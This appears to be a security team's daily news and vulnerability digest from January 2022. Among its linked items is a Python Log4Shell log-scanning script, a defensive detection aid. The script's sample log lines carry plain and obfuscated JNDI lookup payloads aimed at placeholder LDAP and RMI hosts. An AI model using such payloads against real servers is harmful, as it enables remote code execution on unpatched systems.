Daily summary - 04.01.2022

End-of-Day report

Timeframe: Monday 03-01-2022 18:00 - Tuesday 04-01-2022 18:00 Handler: Thomas Pribitzer Co-Handler: n/a

News

A Simple Batch File That Blocks People, (Tue, Jan 4th)

I found another script that performs malicious actions. It's a simple batch file (.bat) that is not obfuscated, but it has a very low VT score (1/53).

https://isc.sans.edu/diary/rss/28212


Purple Fox rootkit now bundled with Telegram installer

The Purple Fox malware family has been found to combine its payload with trusted apps in an interesting way.

https://blog.malwarebytes.com/trojans/2022/01/purple-fox-rootkit-now-bundled-with-telegram-installer/


E-mails about hacks from a phone number? Don't call back!

Criminals are currently sending e-mails in which a phone number is shown as the sender. The recipients' systems have supposedly been hacked and infected with viruses, so the number must urgently be called back. Warning: this is a trap, and the e-mail can be ignored.

https://www.watchlist-internet.at/news/mails-zu-hacks-von-einer-telefonnummer-nicht-zurueckrufen/


A New Web Skimmer Campaign Targets Real Estate Websites Through Attacking Cloud Video Distribution Supply Chain

A supply chain attack leveraging a cloud video platform to distribute web skimmer campaigns compromised more than 100 real estate sites.

https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/


Log4j flaw attack levels remain high, Microsoft warns

Organizations might not realize their environments are already compromised.

https://www.zdnet.com/article/log4j-flaw-attacks-are-causing-lots-of-problems-microsoft-warns/
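Log4Shell (CVE-2021-44228) is triggered by getting a lookup string such as ${jndi:ldap://...} into any field that ends up in a log line, and in-the-wild payloads routinely hide the keyword behind nested lookups (${lower:j}, ${::-j}, ${env:X:-j}). The following is an added example, not code from Microsoft's article or from any project on this page, showing one way to sweep existing logs for both the plain and the nested forms. The log lines are constructed for the example, and normalize_lookups is a simplified model of how Log4j 2 collapses nested lookups (an assumption for detection purposes, not the real resolver).

```python
import re

# Innermost ${...} with no further braces inside; resolved first, like Log4j does.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def normalize_lookups(text: str, max_rounds: int = 50) -> str:
    """Collapse nested Log4j-style lookups so an obfuscated JNDI string
    becomes a plain 'jndi:' token.

    Assumption: simplified model of Log4j 2 lookup resolution covering the
    variants commonly seen in Log4Shell payloads (lower:, upper:, ':-' defaults).
    Unknown lookups keep their content and lose their braces so the loop ends.
    """
    for _ in range(max_rounds):
        m = _INNERMOST.search(text)
        if not m:
            break
        body = m.group(1)
        low = body.lower()
        if low.startswith("lower:"):
            repl = body[len("lower:"):].lower()
        elif low.startswith("upper:"):
            repl = body[len("upper:"):].upper()
        elif low.startswith("jndi:"):
            # Keep the JNDI lookup visible; the URL after it may itself contain ':-'.
            repl = body
        elif ":-" in body:
            # ${lookup:key:-default}: an unresolvable key yields the default, e.g. ${::-j} -> j
            repl = body.split(":-", 1)[1]
        else:
            repl = body
        text = text[: m.start()] + repl + text[m.end():]
    return text


def find_jndi_lookups(lines):
    """Return (line_no, line) for every line whose normalized form contains 'jndi:'."""
    hits = []
    for n, line in enumerate(lines, 1):
        if "jndi:" in normalize_lookups(line).lower():
            hits.append((n, line))
    return hits


# Constructed sample access-log lines (not real traffic): one plain payload,
# one nested-lookup payload in the User-Agent, one in the query string, and
# a benign line that merely mentions "jndi" as a path fragment.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:01:22 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:13:02:10 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:03:41 +0000] "GET /login HTTP/1.1" 404 0 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.23:1389/x}"',
    '10.0.0.11 - - [10/Dec/2021:13:04:05 +0000] "GET /?q=${env:HOME:-j}ndi:rmi://203.0.113.9/obj HTTP/1.1" 200 88 "-" "curl/7.79"',
    '10.0.0.12 - - [10/Dec/2021:13:05:00 +0000] "GET /docs/jndi-lookup.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {n}: {normalize_lookups(line)}")
```

A hit on an old log line is evidence of an attempt, not of compromise; the follow-up is to check whether the logging host made outbound LDAP/RMI connections to the hosts named in the payload. The normalizer is deliberately narrow, so treat it as a triage aid alongside a patched Log4j and egress filtering rather than as a complete signature.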


State-of-the-art EDRs are not perfect, fail to detect common attacks

A team of Greek academics has tested endpoint detection & response (EDR) software from 11 of today's top cybersecurity firms and found that many fail to detect some of the most common attack techniques used by advanced persistent threat actors, such as state-sponsored espionage groups and ransomware gangs.

https://therecord.media/state-of-the-art-edrs-are-not-perfect-fail-to-detect-common-attacks/

Vulnerabilities

Security updates for Tuesday

Security updates have been issued by Debian (salt and thunderbird), Red Hat (xorg-x11-server), and Scientific Linux (xorg-x11-server).

https://lwn.net/Articles/880327/


Security Bulletin: Vulnerabilities in Apache Log4j affect IBM Spectrum Copy Data Management (CVE-2021-45105, CVE-2021-45046)

https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache-log4j-affect-ibm-spectrum-copy-data-management-cve-2021-45105-cve-2021-45046/


Security Bulletin: Apache Log4j vulnerabilities impact IBM Sterling Connect:Direct for UNIX (CVE-2021-45105, CVE-2021-45046)

https://www.ibm.com/blogs/psirt/security-bulletin-apache-log4j-vulnerabilities-impact-ibm-sterling-connectdirect-for-unix-cve-2021-45105-cve-2021-45046/


Security Bulletin: IBM Jazz for Service Management is vulnerable to an Apache Log4j vulnerability (CVE-2021-44228)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-jazz-for-service-management-is-vulnerable-to-a-apache-log4j-vulnerabilitycve-2021-44228-3/


Security Bulletin: IBM Jazz for Service Management is vulnerable to Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-45046)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-jazz-for-service-management-is-vulnerable-to-a-apache-log4j-vulnerabilitiescve-2021-45105-cve-2021-45046-3/


Security Bulletin: Vulnerabilities in Apache Log4j impact IBM Spectrum Protect Plus (CVE-2021-45105, CVE-2021-45046)

https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache-log4j-impact-ibm-spectrum-protect-plus-cve-2021-45105-cve-2021-45046/


Security Bulletin: Vulnerabilities in Apache Log4j affect IBM Spectrum Protect Plus Container Backup and Restore for Kubernetes and OpenShift (CVE-2021-45105, CVE-2021-45046)

https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache-log4j-affect-ibm-spectrum-protect-plus-container-backup-and-restore-for-kubernetes-and-openshift-cve-2021-45105-cve-2021-45046/


VMSA-2022-0001

https://www.vmware.com/security/advisories/VMSA-2022-0001.html


Atlassian Jira Software: Vulnerability allows cross-site scripting

http://www.cert-bund.de/advisoryshort/CB-K22-0002